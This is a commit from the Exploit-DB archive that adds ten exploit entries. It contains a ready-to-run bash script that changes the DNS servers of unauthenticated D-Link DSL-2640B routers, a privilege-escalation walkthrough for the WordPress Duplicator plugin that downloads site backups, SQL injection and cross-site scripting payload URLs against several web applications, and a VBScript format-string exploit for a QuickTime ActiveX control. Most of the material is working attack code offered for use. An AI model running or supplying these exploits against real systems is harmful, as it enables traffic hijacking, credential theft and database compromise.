Update: 2015-02-20

10 new exploits
This commit is contained in:
Offensive Security 2015-02-20 08:35:28 +00:00
parent 114a2afb81
commit 0e49579059
11 changed files with 219 additions and 0 deletions

View file

@ -32536,9 +32536,19 @@ id,file,description,date,author,platform,type,port
36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit",2015-02-18,"Todor Donev",hardware,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36109,platforms/php/webapps/36109.txt,"Mambo CMS N-Myndir Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 'calendar.php' Cross Site Scripting Vulnerability",2011-09-02,T0xic,php,webapps,0
36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 Remote Buffer Overflow Vulnerability",2011-09-05,KedAns-Dz,windows,remote,0
36112,platforms/php/webapps/36112.txt,"Duplicator 0.5.8 Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80
36113,platforms/php/webapps/36113.txt,"YABSoft Advanced Image Hosting Script 2.3 'report.php' Cross Site Scripting Vulnerability",2011-09-05,R3d-D3V!L,php,webapps,0
36114,platforms/php/webapps/36114.txt,"EasyGallery 5 'index.php' Multiple SQL Injection Vulnerabilities",2011-09-05,"Eyup CELIK",php,webapps,0
36115,platforms/windows/remote/36115.txt,"Apple QuickTime 7.6.9 'QuickTimePlayer.dll' ActiveX Buffer Overflow Vulnerability",2011-09-06,"Ivan Sanchez",windows,remote,0
36116,platforms/asp/webapps/36116.txt,"Kisanji 'gr' Parameter Cross Site Scripting Vulnerability",2011-09-06,Bl4ck.Viper,asp,webapps,0
36117,platforms/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-09-06,"Yassin Aboukir",php,webapps,0
36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 'themename' Parameter Cross Site Scripting Vulnerability",2011-09-05,"High-Tech Bridge SA",php,webapps,0
36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross Site Scripting Vulnerability",2011-09-08,sonyy,php,webapps,0
36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection Vulnerability",2011-09-08,SubhashDasyam,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49468/info
Kisanji is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/default.aspx?gr=[xss]

View file

@ -0,0 +1,85 @@
#!/bin/bash
#
# D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Tested firmware version: EU_2.03
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES OR FIRMWARE VERSIONS MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
echo " https://www.facebook.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1

39
platforms/php/webapps/36112.txt Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Every registered user can create and download backup files.
File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');
http://security.szurek.pl/duplicator-058-privilege-escalation.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register) then start scan:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan
After that you can build backup:
http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build
This function will return json with backup name inside File key.
You can download backup using:
http://wordpress-url/wp-snapshots/%file_name_from_json%
3. Solution:
Update to version 0.5.10

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49457/info
YABSoft Advanced Image Hosting Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Advanced Image Hosting Script 2.3 is vulnerable; other versions may also be affected.
http://www.example.com/demo/aihspro/report.php?img_id=[XSS]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49458/info
EasyGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1
http://www.example.com/easygallery/index.php?do=<SQL Injection Code>&page=register&PageSection=0

14
platforms/php/webapps/36117.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/49475/info
GeoClassifieds Lite is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
GeoClassifieds Lite 2.0.1, 2.0.3.1, 2.0.3.2 and 2.0.4 are vulnerable; other versions may also be affected.
http://www.example.com/?a=19&c=id [SQL Attack]
Cookie: language_id=1[SQL attack]
Cookie: </div><script>alert('Xssed-By-Yassin');</script>
http://www.example.com/index.php?a=19&c=</div><script>alert('Xssed By
Yassin');</script>
http://www.example.com/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49491/info
Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Zikula Application Framework 1.3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?module=theme&type=admin&func=setasdefault&themename=%3Cscript%3Ealert%28docu ment.cookie%29%3C/script%3E

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49502/info
SkaDate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/member/blogs.php?tag=blog+[XSS]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49508/info
In-link is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
In-link 5.1.3 RC1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?t=sub_pages&cat=-1+Union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/49465/info
Apple QuickTime is prone to a buffer-overflow vulnerability because of a failure to properly bounds-check user-supplied data.
Successful exploits will allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.
QuickTime 7.6.9 is vulnerable; other versions may also be affected.
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"progid = "QuickTimePlayerLib.QuickTimePlayer"
argCount = 1
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>